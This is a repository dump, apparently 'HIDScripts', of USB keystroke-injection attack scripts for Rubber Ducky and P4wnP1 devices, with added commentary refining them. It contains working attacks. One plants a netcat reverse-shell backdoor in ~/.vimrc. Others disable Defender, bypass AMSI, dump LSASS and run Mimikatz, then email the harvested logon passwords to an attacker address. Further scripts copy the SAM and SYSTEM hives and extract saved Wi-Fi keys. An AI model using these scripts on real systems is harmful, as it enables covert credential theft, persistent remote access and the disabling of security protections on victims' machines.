├── Backdoor
│   └── Linux - VIM Config Netcat Backdoor.md
├── Credentials
│   ├── Credentials - Dump LSASS Process.md
│   ├── Credentials - Mimikatz + Send Result to Mail.md
│   ├── Credentials - Steal SAM and System.md
│   └── Credentials - WifiKeyGrabber.md
├── README.md
└── demo
    └── Credentials
        └── demo-lsass_dump.gif
/Backdoor/Linux - VIM Config Netcat Backdoor.md:
--------------------------------------------------------------------------------
# Linux - VIM Config Netcat Backdoor

## Description

A simple backdoor: a base64-encoded netcat reverse shell is embedded as a shell-out (`!`) line in the user's Vim config file (`~/.vimrc`). Every time the user starts Vim, the line is executed and the reverse shell connects back to the attacker.

## Requirement

1. First note this script has been created and tested under Kali Linux 2021.2 as target.
2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
3. Take the netcat reverse shell of pentest monkey (or whatever) and encode it to base64 (I used a website to encode it). Then replace the base64 string in the code. I used the netcat reverse shell below.
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```
   The base64 string shipped in the code decodes to the same one-liner but with `nc 192.168.1.103 1234`, so re-encode it with your own listener address and port before use.
4. Start a netcat listener on your attacker box.
```bash
nc -nvlp 1234
```

NOTE: I suggest using the website to encode the base64, because doing it in the zsh terminal on Kali split the base64 over two lines. That is GNU `base64` wrapping its output at 76 columns; `base64 -w0` gives the single line the `type()` call needs. Of course, you can do it any way you want as long as it works.

Two caveats:

- `echo ... > ~/.vimrc` overwrites any existing `~/.vimrc`; `>>` appends instead and leaves the user's configuration intact.
- Vim runs `!` lines through the shell named in its `'shell'` option (`$SHELL` by default). `<<<` is a bash/zsh here-string, so the payload fails if that shell is `dash`/`sh`. Because `:!` waits for the command to finish, Vim also stays blocked until the reverse shell connection is closed.

## Code

```bash
layout("CH")
typingSpeed(1, 2)
press("CTRL ALT T")   // open a terminal
delay(1000)
type("echo '!base64 -d <<< cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEwMyAxMjM0ID4vdG1wL2Y= | sh' > ~/.vimrc")
press("ENTER")
delay(1000)
type("exit")
press("ENTER")        // close the terminal
delay(1000)
press("ALT F2")       // application finder / run dialog
delay(1000)
type("vim wootwoot")  // starting Vim runs the ':!' line from ~/.vimrc
press("ENTER")
```

--------------------------------------------------------------------------------
/Credentials/Credentials - Dump LSASS Process.md:
--------------------------------------------------------------------------------
# Credentials - Dump LSASS Process

## Description

This script downloads MiniDump, extracts it and runs it to dump the LSASS process to "C:\\lsass.dmp" (or wherever you want).

## Requirement

1. First note this script has been created and tested under Windows 11 Build 22000.
2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
3. The logged-on user must be a local administrator: the script answers two UAC prompts (the Defender settings change and the elevated PowerShell) with LEFT then ENTER.
4. The "windowsdefender:" part navigates the Windows Security app with TAB presses to turn Real-time protection off, so it is tied to that build's UI layout. The "T" typed after "rmdir MiniDump" answers the Remove-Item confirmation with "Tout" (Yes to All) on a French-localised PowerShell; on an English system the answer is "A".

## DEMO

![LSASS dump demo](../demo/Credentials/demo-lsass_dump.gif)

## Code

```bash
layout("ch")
press("GUI r")
delay(1000)
type("windowsdefender:")   // open Windows Security
press("ENTER")
delay(1000)
press("ENTER")
delay(1000)
press("TAB")               // navigate to "Manage settings"
press("TAB")
press("TAB")
press("TAB")
press("ENTER")
delay(1000)
press("SPACE")             // toggle Real-time protection off
delay(1000)
press("LEFT")              // UAC: move to "Yes"
delay(1000)
press("ENTER")
delay(1000)
press("GUI r")
delay(200)
type("powershell.exe start-process powershell -verb runas")   // elevated PowerShell
press("ENTER")
delay(1500)
press("LEFT")              // UAC: "Yes"
press("ENTER")
delay(1000)
type("[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)")   // amsiInitFailed AMSI bypass, strings split to avoid the signature
press("ENTER")
delay(1000)
type("(New-Object System.Net.WebClient).DownloadFile('https://github.com/V0lk3n/OSEP-CheatSheet/releases/download/MiniDump/MiniDump.zip','C:\\MiniDump.zip')")
press("ENTER")
delay(1000)
type("cd /")
press("ENTER")
delay(500)
type("mkdir MiniDump")
press("ENTER")
delay(500)
type("Expand-Archive -Path MiniDump.zip -DestinationPath C:\\MiniDump")
press("ENTER")
delay(1500)
type("cd MiniDump")
press("ENTER")
delay(500)
type(".\\MiniDump.exe")
press("ENTER")
delay(1000)
type("C:\\lsass.dmp")      // output path for the dump
press("ENTER")
delay(1000)
type("cd /")
press("ENTER")
type("rmdir MiniDump")
press("ENTER")
delay(1000)
type("T")                  // "Tout" = Yes to All on French PowerShell; "A" on English
press("ENTER")
delay(1000)
type("del MiniDump.zip")
press("ENTER")
delay(500)
type("exit")
press("ENTER")
delay(1000)
press("SPACE")             // Windows Security: turn Real-time protection back on
delay(1000)
press("ALT F4")
```

--------------------------------------------------------------------------------
/Credentials/Credentials - Mimikatz + Send Result to Mail.md:
--------------------------------------------------------------------------------
# Credentials - Mimikatz + Send Result to Mail

## Description

This is a simple HIDScript that disables Windows Defender real-time protection, runs Mimikatz (`sekurlsa::logonPasswords`) and saves the result to a log.
It then sends you the log by mail as an attachment, deletes the Mimikatz and log files and finally re-enables Windows Defender.

## Requirement

1. First note this script has been created and tested under Windows 11 Build 22000.

2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.

3. Change the sender e-mail/password and set the attacker e-mail address that will receive the mail with the Mimikatz log attached.

4. To deliver the mail you first had to allow less secure apps to access your Gmail account, which meant disabling 2FA and then enabling less secure app access. I suggest creating a Gmail account only for this purpose instead of using your personal account, since disabling 2FA exposes it. Google has since removed the less-secure-apps option; the current way to authenticate an SMTP client against smtp.gmail.com:587 is an App Password (which requires 2-Step Verification to be on), so put that 16-character password in `$emailSmtpPass`.

## Rubber/Pico Ducky Version

```bash
REM Open Windows Security and turn Real-time protection off
GUI r
DELAY 1000
STRING windowsdefender:
ENTER
DELAY 1000
ENTER
DELAY 1000
TAB
TAB
TAB
TAB
ENTER
DELAY 1000
SPACE
DELAY 1000
REM UAC prompt: LEFT selects "Yes"
LEFT
DELAY 1000
ENTER
DELAY 1000
REM Elevated PowerShell
GUI r
DELAY 1000
STRING powershell.exe start-process powershell -verb runas
ENTER
DELAY 1500
LEFT
ENTER
DELAY 1000
REM amsiInitFailed AMSI bypass, strings split to avoid the signature
STRING [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
ENTER
DELAY 1000
REM STRING types literally, so Windows paths use single backslashes here
STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip','C:\mimikatz_trunk.zip')
ENTER
DELAY 1000
STRING cd /
ENTER
DELAY 1000
STRING mkdir mimi
ENTER
DELAY 1000
STRING Expand-Archive -Path mimikatz_trunk.zip -DestinationPath C:\mimi
ENTER
DELAY 1500
STRING cd mimi\x64
ENTER
DELAY 1000
STRING .\mimikatz.exe
ENTER
DELAY 1000
STRING log log.txt
ENTER
DELAY 1000
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords
ENTER
DELAY 1000
REM Leave mimikatz so the next line is typed into PowerShell
STRING exit
ENTER
DELAY 1000
REM Mail the log. From must be a valid address; "Display Name <address>" is the accepted form
STRING $emailSmtpServer = 'smtp.gmail.com';$emailSmtpServerPort = '587';$emailSmtpUser = 'sender@gmail.com';$emailSmtpPass = 'YourSuperPassword';$emailMessage = New-Object System.Net.Mail.MailMessage;$emailMessage.From = 'HIDScript LogonPassword Mimikatz <sender@gmail.com>';$emailMessage.To.Add('attacker@protonmail.com');$emailMessage.Body = 'W00tW00t, You received one log file, see attachment!';$SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );$SMTPClient.EnableSsl = $true;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );$attachment = 'C:\mimi\x64\log.txt';$emailMessage.Attachments.Add($attachment);$SMTPClient.Send($emailMessage)
ENTER
DELAY 2000
STRING cd /
ENTER
DELAY 200
STRING rmdir mimi
ENTER
DELAY 1000
REM "T" = "Tout" (Yes to All) on a French PowerShell; use "A" on an English system
STRING T
ENTER
DELAY 1000
STRING del mimikatz_trunk.zip
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 1000
REM Back in Windows Security: turn Real-time protection on again and close it
SPACE
DELAY 1000
ALT F4
```

## P4wnP1 Version

```bash
layout("ch")
press("GUI r")
delay(1000)
type("windowsdefender:")   // open Windows Security
press("ENTER")
delay(1000)
press("ENTER")
delay(1000)
press("TAB")               // navigate to "Manage settings"
press("TAB")
press("TAB")
press("TAB")
press("ENTER")
delay(1000)
press("SPACE")             // toggle Real-time protection off
delay(1000)
press("LEFT")              // UAC: move to "Yes"
delay(1000)
press("ENTER")
delay(1000)
press("GUI r")
delay(200)
type("powershell.exe start-process powershell -verb runas")   // elevated PowerShell
press("ENTER")
delay(1500)
press("LEFT")              // UAC: "Yes"
press("ENTER")
delay(1000)
type("[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)")   // amsiInitFailed AMSI bypass
press("ENTER")
delay(1000)
type("(New-Object System.Net.WebClient).DownloadFile('https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip','C:\\mimikatz_trunk.zip')")
press("ENTER")
delay(1000)
type("cd /")
press("ENTER")
delay(500)
type("mkdir mimi")
press("ENTER")
delay(500)
type("Expand-Archive -Path mimikatz_trunk.zip -DestinationPath C:\\mimi")
press("ENTER")
delay(1500)
type("cd mimi")
press("ENTER")
delay(500)
type("cd x64")
press("ENTER")
delay(500)
type(".\\mimikatz.exe")
press("ENTER")
delay(1000)
type("log log.txt")
press("ENTER")
delay(1000)
type("privilege::debug")
press("ENTER")
delay(1000)
type("sekurlsa::logonPasswords")
press("ENTER")
delay(1000)
type("exit")               // leave mimikatz so the mail command goes to PowerShell
press("ENTER")
delay(1000)
type("$emailSmtpServer = 'smtp.gmail.com';$emailSmtpServerPort = '587';$emailSmtpUser = 'sender@gmail.com';$emailSmtpPass = 'YourSuperPassword';$emailMessage = New-Object System.Net.Mail.MailMessage;$emailMessage.From = 'HIDScript LogonPassword Mimikatz <sender@gmail.com>';$emailMessage.To.Add('attacker@protonmail.com');$emailMessage.Body = 'W00tW00t, You received one log file, see attachment!';$SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );$SMTPClient.EnableSsl = $true;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );$attachment = 'C:\\mimi\\x64\\log.txt';$emailMessage.Attachments.Add($attachment);$SMTPClient.Send($emailMessage)")
press("ENTER")
delay(2000)
type("cd /")
press("ENTER")
type("rmdir mimi")
press("ENTER")
delay(1000)
type("T")                  // "Tout" = Yes to All on French PowerShell; "A" on English
press("ENTER")
delay(1000)
type("del mimikatz_trunk.zip")
press("ENTER")
delay(500)
type("exit")
press("ENTER")
delay(1000)
press("SPACE")             // Windows Security: turn Real-time protection back on
delay(1000)
press("ALT F4")
```

--------------------------------------------------------------------------------
/Credentials/Credentials - Steal SAM and System.md:
--------------------------------------------------------------------------------
# Credentials - Steal SAM and System

## Description

This is a simple HIDScript that creates a Volume Shadow Copy of the C: drive and copies the SAM and SYSTEM hives from it into your current directory.

## Requirement

1. First note this script has been created and tested under Windows 11 Build 22000.
2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
3. Change the "cd /d D:\\" command to the location where you want the files saved. Basically it should be your Rubber Ducky device or whatever. In cmd, "cd D:\\" alone only sets the working directory of drive D without switching to it; "/d" is needed to actually change drives.
4. The shadow volume is set to "HarddiskVolumeShadowCopy1" on the assumption that the target computer has never created a shadow copy before. Otherwise it can be "HarddiskVolumeShadowCopy2" or higher. "vssadmin list shadows" shows the exact name under "Shadow Copy Volume", and "wmic shadowcopy call create" prints the ShadowID of the snapshot it created.
5. The "O" typed after "vssadmin delete shadows /All" answers the confirmation prompt on a French Windows ("Oui"); on an English system type "Y". Note that "/All" also removes any restore points that already existed on the machine, not only the snapshot the script created.

## Code

```bash
layout("ch")
press("GUI r")
delay(200)
type("powershell.exe start-process cmd -verb runas")   // elevated cmd
press("ENTER")
delay(1500)
press("LEFT")                                          // UAC: "Yes"
press("ENTER")
delay(1000)
type("cd /d D:\\")                                     // switch to the destination drive
press("ENTER")
delay(500)
type("wmic shadowcopy call create Volume='C:\\'")
press("ENTER")
delay(3000)
type("copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam .")
press("ENTER")
delay(1000)
type("copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system .")
press("ENTER")
delay(1000)
type("vssadmin delete shadows /All")
press("ENTER")
delay(500)
type("O")                                              // "Oui" on French Windows; "Y" on English
press("ENTER")
delay(2000)
type("exit")
press("ENTER")
```
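As an added example (not code from this repository), the PowerShell below does the same steps as the cmd sequence above through WMI/CIM: it reads back the device path of the snapshot it just created instead of assuming `HarddiskVolumeShadowCopy1`, copies the hives with the same `copy` the HIDScript types, and removes only its own snapshot rather than every shadow copy on the machine. It must run from an elevated prompt; the function name and `$Dest` (defaulting to `D:\`, the drive letter of your Ducky/P4wnP1 storage as in requirement 3) are my assumptions.

```powershell
# Added example, not code from the HIDScripts repo. Run elevated. Creates a shadow copy of C:,
# resolves its \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path, copies SAM and SYSTEM
# to $Dest and deletes that one snapshot again.
function Copy-SamAndSystemFromShadow {
    param([string]$Dest = 'D:\')     # assumption: your USB drive letter

    # Same operation as "wmic shadowcopy call create Volume='C:\'"
    $shadowClass = [wmiclass]'root\cimv2:Win32_ShadowCopy'
    $result      = $shadowClass.Create('C:\', 'ClientAccessible')
    if ($result.ReturnValue -ne 0) { throw "Shadow copy creation failed, return code $($result.ReturnValue)" }

    # Look the snapshot up by the ID we were given; DeviceObject is the exact GLOBALROOT path
    $shadow = Get-CimInstance -ClassName Win32_ShadowCopy -Filter "ID='$($result.ShadowID)'"
    $dev    = $shadow.DeviceObject    # e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3

    try {
        foreach ($hive in 'SAM', 'SYSTEM') {
            # Copy-Item does not handle the \\?\GLOBALROOT prefix reliably, so use cmd's copy
            # exactly as the HIDScript does, just with the resolved device path
            cmd.exe /c copy "$dev\Windows\System32\config\$hive" "$Dest" | Out-Null
            if ($LASTEXITCODE -ne 0) { throw "copy of $hive from $dev failed" }
        }
    }
    finally {
        # Remove only our snapshot. "vssadmin delete shadows /All" would also destroy the
        # machine's existing restore points, and this needs no locale-dependent O/Y answer.
        $shadow | Remove-CimInstance
    }

    Get-Item -Path (Join-Path $Dest 'SAM'), (Join-Path $Dest 'SYSTEM')
}

Copy-SamAndSystemFromShadow -Dest 'D:\'
```

The `try`/`finally` matters operationally: if a copy fails the snapshot is still cleaned up, so you do not leave a fresh shadow copy behind as an artefact of the attempt.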
--------------------------------------------------------------------------------
/Credentials/Credentials - WifiKeyGrabber.md:
--------------------------------------------------------------------------------
# Credentials - WiFiKeyGrabber

## Description

WiFiKeyGrabber is a simple HIDScript that shows the saved Wi-Fi passwords in the PowerShell output.

## Requirement

1. First note this script has been created and tested under Windows 11 Build 22000.
2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
3. `netsh wlan export profile key=clear` writes one `<interface name>-<profile name>.xml` per saved network into the current directory, so the `Wi-Fi*.xml` pattern assumes the adapter is called "Wi-Fi". If it is named differently (for example on a non-English Windows), adjust the pattern or match `*.xml` from an otherwise empty folder.

## Rubber/Pico Ducky Version

```bash
DEFAULT_DELAY 1000
GUI r
DELAY 200
STRING powershell.exe -nop -exec bypass
ENTER
DELAY 200
REM One <interface>-<profile>.xml per saved network, keyMaterial in clear text
STRING netsh wlan export profile key=clear
ENTER
DELAY 200
STRING Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' | Select Filename, LineNumber, Line, Path | Format-Table
ENTER
DELAY 200
REM Clean up the exported profiles
STRING del Wi-Fi*.xml
ENTER
```

## P4wnP1 Version

```bash
layout("ch")
press("GUI r")
delay(200)
type("powershell.exe -nop -exec bypass")
press("ENTER")
delay(1000)
type("netsh wlan export profile key=clear")   // one <interface>-<profile>.xml per saved network
press("ENTER")
type("Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' | Select Filename, LineNumber, Line, Path | Format-Table")
press("ENTER")
type("del Wi-Fi*.xml")                        // clean up the exported profiles
press("ENTER")
```

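As an added example (not code from this repository), here is a PowerShell function that parses the profile XML `netsh wlan export profile key=clear` writes, instead of grepping for `keyMaterial`, so the SSID, authentication type and key come out together per network and open or 802.1X profiles (which have no `sharedKey` element) are listed rather than silently skipped. The sample XML is constructed here in the shape netsh produces, not captured from a real host; the function name is mine.

```powershell
# Added example, not code from the HIDScripts repo. Turns one exported WLAN profile
# into an object with SSID, auth type and key, rather than a grep hit on keyMaterial.
function ConvertFrom-WlanProfileXml {
    param([Parameter(Mandatory)][string]$Xml)

    $doc = [xml]$Xml
    $p   = $doc.WLANProfile                 # dotted access ignores the WLAN profile namespace
    $sec = $p.MSM.security

    [pscustomobject]@{
        SSID           = $p.SSIDConfig.SSID.name
        Authentication = $sec.authEncryption.authentication   # open, WPA2PSK, WPA3SAE, ...
        Encryption     = $sec.authEncryption.encryption
        KeyType        = $sec.sharedKey.keyType                # passPhrase or networkKey
        Key            = $sec.sharedKey.keyMaterial            # $null for open / 802.1X profiles
        Protected      = $sec.sharedKey.protected              # 'true' when exported without key=clear
    }
}

# Constructed sample in the shape netsh writes with key=clear (not captured from a real host)
$sample = @'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>HomeNet</name>
  <SSIDConfig><SSID><hex>486F6D654E6574</hex><name>HomeNet</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX>
    </authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>Sup3rS3cret!</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>
'@

ConvertFrom-WlanProfileXml -Xml $sample | Format-List

# Live use, in the folder where "netsh wlan export profile key=clear" dropped its files:
# Get-ChildItem *.xml | ForEach-Object { ConvertFrom-WlanProfileXml (Get-Content $_ -Raw) } | Format-Table
```

Matching `*.xml` from the export folder also sidesteps the interface-name problem from requirement 3, since the function does not care what netsh called the file.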
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# HIDScripts
HIDScripts is my collection of scripts, created to be used with the Rubber Ducky/Pico Ducky and the P4wnP1 A.L.O.A. project.

## Credentials

* Credentials - Mimikatz + Send Result to Mail
* Credentials - WiFiKeyGrabber
* Credentials - Steal SAM and SYSTEM
* Credentials - Dump LSASS Process

## Backdoor

* Linux - VIM Config Netcat Backdoor

--------------------------------------------------------------------------------
/demo/Credentials/demo-lsass_dump.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V0lk3n/HIDScripts/3dccb70418ceebbf4126b25c16a636171e012a2c/demo/Credentials/demo-lsass_dump.gif
--------------------------------------------------------------------------------